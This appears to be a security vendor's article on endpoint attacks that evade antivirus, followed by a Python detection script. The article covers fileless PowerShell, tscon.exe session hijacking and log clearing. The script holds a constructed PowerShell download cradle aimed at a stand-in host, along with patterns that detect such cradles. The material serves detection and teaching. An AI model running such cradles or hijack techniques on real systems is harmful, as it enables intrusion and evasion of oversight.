5 Endpoint Attacks Your Antivirus Won’t Catch

  • For cyber attackers, the endpoint is THE point
  • How these attacks evade detection by antivirus
  • These 4 critical steps show how it’s done

Endpoints are the point of entry into your environment, your data, your credentials, and potentially your entire business. A compromised endpoint provides everything an attacker needs to gain a foothold on your network, steal data, and potentially hold it for ransom. Unless you protect your critical endpoints (including servers, laptops, and desktops), you may be leaving the front door wide open for attackers.

Attackers have figured out how to bypass traditional antivirus software with fileless attacks designed to hide within sanctioned applications and even within the OS itself. So even if you're vigilant about installing patches and pushing out antivirus updates, your organization is likely still at risk. Keep reading to understand:

  • How attackers have adapted their tactics to evade traditional antivirus
  • How these increasingly common attacks work
  • How to quickly evolve your threat detection strategy

5 attacks your traditional antivirus won’t catch

1. Cryptomining malware

Cryptomining tools convert computing power into revenue. The cryptocurrency market is growing rapidly, and the computing power (CPU and GPU time, plus the electricity behind it) required to mine cryptocurrency is expensive. So attackers create malware and other attacks to quietly siphon computing resources from victims for cryptomining. Methods include:

  • Exploiting exposed AWS resources or AWS account credentials to steal cloud computing resources, often referred to as “cryptojacking”
  • Browser-based attacks that work while a visitor is browsing a legitimate, yet compromised website
  • Cryptomining malware, often delivered through phishing campaigns, that consumes CPU on your endpoints

Any flavor of cryptomining attacks can have disastrous effects for your business. Attackers can turn compromised endpoints and clouds into silent zombie armies of cryptocurrency miners–all without a single antivirus alert. Without advanced threat detection tools that span your endpoints and public clouds, your only indication that your computing resources may have been hijacked could be an application or network performance hit or a skyrocketing AWS invoice.

2. Reverse PowerShell attacks

Even in spy novels, everyone knows that the best way to avoid detection is to act like you belong. Attackers follow this approach, as they increasingly use PowerShell and other sanctioned services to evade traditional antivirus software. By gaining access to admin credentials and executing authorized administration actions, cyber attackers can reduce their reliance on malware and exploit kits and more easily evade detection, making for a stealthier data theft operation.

3. Remote desktop protocol (RDP) session jacking

The remote desktop protocol (RDP) lets you connect to a Windows system remotely, and normally you must supply the user's password before you get a session. However, a known technique bypasses this: tscon.exe (the built-in Windows utility that attaches a user session to a different session; it is not the RDP client, which is mstsc.exe) can be run as the SYSTEM user, and when run as SYSTEM it connects to another user's session, including a disconnected one, without prompting for that user's password. No antivirus alarms go off, because tscon.exe is a signed Windows binary doing exactly what it was built to do.

Pro-tip: Publicly available RDP services on your endpoints serve as an open invitation to attackers, so make sure your gateway firewall policy blocks these connections by default (or only allows connections from authorized IP addresses).

4. Advanced persistent threats (APTs) / rootkits

Advanced persistent threats (APTs) involve a series of steps, each of which can easily evade traditional methods of detection (we address each of these steps in detail in the next section). These blended threats often start with a phishing email to capture credentials, then move on to installing malware such as rootkits, which embed themselves deep in the endpoint's OS. Once the attacker has kernel-level (root) control, all bets are off: the system is fully owned, and anything running on it, including the antivirus agent, can be fed false information about what the system is doing.

5. Ransomware

Attackers know how to innovate. Recent ransomware innovations include ransomware-as-a-service and targeting widely used corporate cloud apps. One example that easily evades antivirus is the ShurL0ckr ransomware, which targets cloud-based enterprise file-sharing platforms. Ransomware-as-a-service lets affiliates with little technical skill generate and distribute the payload that encrypts files on disk, paying the ransomware's author a percentage of each ransom collected.

How these attacks evade detection by antivirus

While these attacks may have their differences, they share some specific characteristics that help them avoid detection by traditional antivirus tools.

These 4 critical steps show how it’s done.

1. Delivery

Signature-based antivirus tools try to catch and quarantine malicious files as they are downloaded or executed on endpoints. The problem is that modern attacks operate without downloading or executing malicious files on the hard drive. Instead, they utilize social engineering (phishing), exploit OS vulnerabilities, and package malicious code within normal-looking files to evade detection in the delivery process.

For example, a trojan can employ email phishing to deliver malicious code as a macro inside a familiar document type. Once an attacker has a foothold on the victim's endpoint, they can use PowerShell to download the payload and propagate. And because traditional antivirus is built to look for unusual files, PowerShell and other native processes run easily under its radar.

2. Evasion

The best offense is to use the native components of a system against itself. By using what’s already on an endpoint (e.g. tscon.exe, PowerShell, etc.), cyber attackers execute attacks much faster while also evading antivirus detection.

3. Lateral movement

Endpoints provide attackers a necessary foothold into a victim’s network. Once an endpoint is compromised–and any endpoint will do–the next step is to move laterally through the network to find desired assets and targets (domain admin credentials, file servers, etc.). Once an attacker has domain admin credentials, they can move literally anywhere within that domain, stealing and exfiltrating data without antivirus software triggering a single alert.

4. Cover tracks

After doing their dirty work, a smart attacker will cover their tracks. With domain admin credentials, attackers can easily clear the logs on each endpoint they used within that domain to avoid leaving critical forensic evidence behind for investigators. With one PowerShell script, all the digital breadcrumbs of the theft disappear, and no antivirus tool is built to notice this. Clearing the Windows Security log does leave one trace, however: event 1102 ("the audit log was cleared") is written to the freshly emptied log, and any events already forwarded off the host before the wipe are out of the attacker's reach, which is why centralized log collection matters.
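The four steps above, and the PowerShell and tscon.exe techniques from the attack list, share a property: the activity shows up in Windows event logs even when no antivirus signature fires. The following is an added example, not code from the whitepaper or its vendor, of what a minimal detection pass over that telemetry looks like. It constructs a handful of sample events (hostnames, user names, the example.invalid URL and the simplified field names are all this example's own; real Security event 4688 and Sysmon event 1 records carry many more fields, and 4688 includes the command line only if the "Include command line in process creation events" policy is enabled) and runs three rules over them: PowerShell with an encoded or download-cradle command line, especially when spawned by an Office process; tscon.exe executing as SYSTEM; and Security event 1102, the log-cleared marker described above.

```python
import base64
import binascii
import re

# Constructed sample events (not real telemetry). Field names are this
# example's own simplification of Security event 4688 / Sysmon event 1
# (process creation) and Security event 1102 (audit log cleared).
CONSTRUCTED_CRADLE = (
    "IEX (New-Object Net.WebClient).DownloadString('http://example.invalid/p.ps1')"
)
_ENCODED = base64.b64encode(CONSTRUCTED_CRADLE.encode("utf-16-le")).decode()

SAMPLE_EVENTS = [
    {   # Office spawning hidden PowerShell with an encoded download cradle
        "event_id": 4688, "host": "WS01", "user": "CORP\\jdoe",
        "image": r"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe",
        "parent_image": r"C:\Program Files\Microsoft Office\root\Office16\WINWORD.EXE",
        "command_line": "powershell.exe -nop -w hidden -enc " + _ENCODED,
    },
    {   # tscon.exe launched as SYSTEM: the session-hijack pattern from the text
        "event_id": 4688, "host": "SRV02", "user": "NT AUTHORITY\\SYSTEM",
        "image": r"C:\Windows\System32\tscon.exe",
        "parent_image": r"C:\Windows\System32\cmd.exe",
        "command_line": "tscon.exe <arguments omitted>",
    },
    {   # Security log cleared on the same host afterwards
        "event_id": 1102, "host": "SRV02", "user": "CORP\\jdoe",
    },
    {   # Benign scheduled PowerShell: must not alert
        "event_id": 4688, "host": "WS03", "user": "CORP\\svc_mgmt",
        "image": r"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe",
        "parent_image": r"C:\Windows\System32\svchost.exe",
        "command_line": r"powershell.exe -File C:\scripts\inventory.ps1",
    },
]

# PowerShell accepts abbreviated switches (-e, -ec, -enc, -EncodedCommand ...).
ENC_SWITCH = re.compile(r"(?i)(?:^|\s)[-/](?:e|ec|en[a-z]*)\s+([A-Za-z0-9+/=]{16,})")
HIDDEN_SWITCH = re.compile(r"(?i)(?:^|\s)[-/]w[a-z]*\s+hidden")
CRADLE = re.compile(
    r"(?i)DownloadString|DownloadFile|Net\.WebClient|Invoke-Expression|\bIEX\b"
    r"|Invoke-WebRequest|FromBase64String"
)
OFFICE_PARENTS = {"winword.exe", "excel.exe", "powerpnt.exe", "outlook.exe"}
POWERSHELL_IMAGES = {"powershell.exe", "powershell_ise.exe", "pwsh.exe"}


def decode_encoded_command(command_line):
    """Return the decoded -EncodedCommand payload, or None if there is none.

    PowerShell expects the argument to be base64 of UTF-16LE text, so a
    detector has to decode it the same way before looking for cradles.
    """
    match = ENC_SWITCH.search(command_line)
    if not match:
        return None
    try:
        raw = base64.b64decode(match.group(1), validate=True)
    except binascii.Error:
        return None
    return raw.decode("utf-16-le", errors="replace")


def _basename(path):
    return path.replace("/", "\\").rsplit("\\", 1)[-1].lower()


def analyze_event(event):
    """Return the list of reasons this event is suspicious (empty if none)."""
    reasons = []
    if event["event_id"] == 4688:
        image = _basename(event.get("image", ""))
        parent = _basename(event.get("parent_image", ""))
        cmd = event.get("command_line", "")
        if image in POWERSHELL_IMAGES:
            decoded = decode_encoded_command(cmd)
            if decoded is not None:
                reasons.append("powershell: encoded command")
            if CRADLE.search(decoded or cmd):
                reasons.append("powershell: download cradle")
            if HIDDEN_SWITCH.search(cmd):
                reasons.append("powershell: hidden window")
            if parent in OFFICE_PARENTS:
                reasons.append("powershell: spawned by Office (%s)" % parent)
        if image == "tscon.exe" and event.get("user", "").upper().endswith("\\SYSTEM"):
            reasons.append("tscon.exe running as SYSTEM (RDP session hijack pattern)")
    elif event["event_id"] == 1102:
        reasons.append("Security log cleared by %s" % event.get("user", "?"))
    return reasons


def run_detection(events):
    """Run every rule over the events; return one alert dict per flagged event."""
    alerts = []
    for event in events:
        reasons = analyze_event(event)
        if reasons:
            alerts.append({"host": event["host"], "event_id": event["event_id"],
                           "user": event.get("user"), "reasons": reasons})
    return alerts


if __name__ == "__main__":
    for alert in run_detection(SAMPLE_EVENTS):
        print(alert["host"], alert["event_id"], alert["user"], "; ".join(alert["reasons"]))
```

Run against the constructed events, the pass flags the Office-spawned encoded PowerShell on WS01, the SYSTEM-context tscon.exe on SRV02 and the log-clear on SRV02, and stays silent on the scheduled inventory script. None of these rules needs a file hash or a signature; they key on who ran a legitimate binary, from where, and with what arguments, which is exactly the information an antivirus file scan never sees.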
